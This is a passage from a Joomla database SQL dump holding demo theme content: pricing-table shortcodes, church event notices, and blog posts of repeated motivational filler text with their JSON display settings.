table-config=\"\" table-caption=\"<strong>Mega </strong>Plan\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$35[sub]/mo[/sub][/price-tag][li]24/6 Support[/li][li]8 months Renewal[/li][li]7 User Licences[/li][li]No Contracts[/li][li]9 Domain[/li][/price-col]\r\n[price-col table-config=\"last\" table-caption=\"<strong>Developer</strong>\" action-url=\"#\" action-caption=\"Sign Up\"][price-tag]$55[sub]/mo[/sub][/price-tag][li]24/7 Support[/li][li]10 months Renewal[/li][li]10 User Licences[/li][li]No Contracts[/li][li]10 Domain[/li][/price-col]\r\n[/pricing]\r\n[toggle state=\"code\" title=\"show code\"]<i>[</i>pricing columns=\"six\"]\r\n\r\n<i>[</i>price-col table-config=\"first\" table-caption=\"Standard Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$7<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/5 Support<i>[</i>/li]\r\n<i>[</i>li]3 months Renewal<i>[</i>/li]\r\n<i>[</i>li]1 User Licence<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]1 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"\" table-caption=\"Professional Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$15<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/6 Support<i>[</i>/li]\r\n<i>[</i>li]5 months Renewal<i>[</i>/li]\r\n<i>[</i>li]3 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]3 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>price-col table-config=\"last\" table-caption=\"Developer Plan\" action-url=\"#\" action-caption=\"Sign Up\"]\r\n<i>[</i>price-tag]$20<i>[</i>sub]/mo<i>[</i>/sub]<i>[</i>/price-tag]\r\n<i>[</i>li]24/7 Support<i>[</i>/li]\r\n<i>[</i>li]7 months Renewal<i>[</i>/li]\r\n<i>[</i>li]5 User Licences<i>[</i>/li]\r\n<i>[</i>li]No Contracts<i>[</i>/li]\r\n<i>[</i>li]5 Domain<i>[</i>/li]\r\n<i>[</i>/price-col]\r\n\r\n<i>[</i>/pricing][/toggle]', '', 1, 2, '2012-06-19 04:14:59', 196, '', '2014-07-27 11:46:11', 42, 0, '0000-00-00 00:00:00', '2012-06-19 04:14:59', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 94, 13, '', '', 1, 502, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(65, 138, 'Healing Revival Meetings', 'healing-revival-meetings', '<div class=\"desc\">We are holding a healing revival meeting at the Cathedral from this Friday till Sunday morning. Come believing and have faith to receive your healing</div>\r\n<div class=\"title\">28th September</div>', '', 1, 26, '2012-08-29 07:44:02', 196, '', '2012-09-21 11:07:30', 42, 0, '0000-00-00 00:00:00', '2012-08-29 07:44:02', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 4, '', '', 1, 501, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(66, 139, 'Arise and Shine', 'arise-and-shine', '<div class=\"desc\">Bible reading for today. Arise, shine; for thy light is come, and the glory of the LORD is risen upon thee.</div>\r\n<div class=\"title\">Isaiah 60: 1</div>', '', 1, 26, '2012-08-29 07:44:02', 196, '', '2012-09-21 11:07:30', 42, 0, '0000-00-00 00:00:00', '2012-08-29 07:44:02', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 7, 1, '', '', 1, 787, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(67, 140, 'Trip to Egypt, this fall', 'trip-to-egypt-this-fall', '<div class=\"desc\">We are planning a two week visit to Egypt and its environs. Pyramids and sphinx are on the list. That\'s a trip to remember. Don\'t miss it</div>\r\n<div class=\"title\">23rd - 31st October</div>', '', 1, 26, '2012-08-29 07:44:02', 196, '', '2012-09-21 11:07:30', 42, 0, '0000-00-00 00:00:00', '2012-08-29 07:44:02', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 3, 2, '', '', 1, 494, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(68, 141, 'Worship Live Concert!', 'worship-live-concert', '<div class=\"desc\">All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss</div>\r\n<div class=\"title\">29th - 30th September</div>', '', 1, 26, '2012-08-29 07:44:02', 196, '', '2012-09-21 11:07:30', 42, 0, '0000-00-00 00:00:00', '2012-08-29 07:44:02', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 3, '', '', 1, 844, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(69, 143, 'Do not dwell in the past', 'do-not-dwell-in-the-past', '<a data-spotlight=\"on\" data-lightbox=\"on\" href=\"images/demo/blog/blog_1.png\"><img src=\"images/demo/blog/blog_1.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself.</p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n', '\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:55:04', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 5, '', '', 1, 969, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(70, 144, 'The world owes you nothing', 'the-world-owes-you-nothing', '<a data-spotlight=\"on\" data-lightbox=\"transitionIn:elastic; transitionOut:elastic;\" href=\"images/demo/blog/blog_2.png\"><img src=\"images/demo/blog/blog_2.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">The world owes you nothing. It was here first. Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim.</p>\r\n\r\n', '\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:55:40', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 9, 4, '', '', 1, 495, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(71, 145, 'This is the way to success', 'this-is-the-way-to-success', '<video width=\"100%\" height=\"420\" poster=\"images/demo/video/movie_bg.png\">\r\n<source type=\"video/mp4\" url=\"images/demo/video/envato_sting.mp4\" />\r\n<source type=\"video/ogg\" url=\"images/demo/video/envato_sting.ogv\"/>\r\n<source type=\"video/webm\" url=\"images/demo/video/envato_sting.webm\"/>\r\n</video>\r\n\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.<p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n', '\r\n  \r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n\r\n[blockquote author=\"unknown\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n  \r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:55:59', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 20, 3, '', '', 1, 610, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(72, 146, 'We are the change we seek', 'we-are-the-change-we-seek', '<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.<p>\r\n\r\n', '\r\n  \r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n  \r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n\r\n[blockquote author=\"unknown\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n  \r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:56:16', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 2, '', '', 1, 1261, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(73, 147, 'live on that idea', 'live-on-that-idea', '<a data-spotlight=\"on\" data-lightbox=\"transitionIn:elastic; transitionOut:elastic;\" href=\"images/demo/blog/blog_3.png\"><img src=\"images/demo/blog/blog_3.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy;</p>\r\n\r\n', '\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:56:55', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 5, 1, '', '', 1, 461, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(74, 148, 'Change your attitude', 'change-your-attitude', '<a data-spotlight=\"on\" data-lightbox=\"on\" href=\"images/demo/blog/blog_1.png\"><img src=\"images/demo/blog/blog_1.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself.</p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n', '\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 27, '2012-08-30 13:21:21', 196, '', '2014-07-26 08:57:14', 42, 0, '0000-00-00 00:00:00', '2012-08-30 13:21:21', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 4, 0, '', '', 1, 799, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
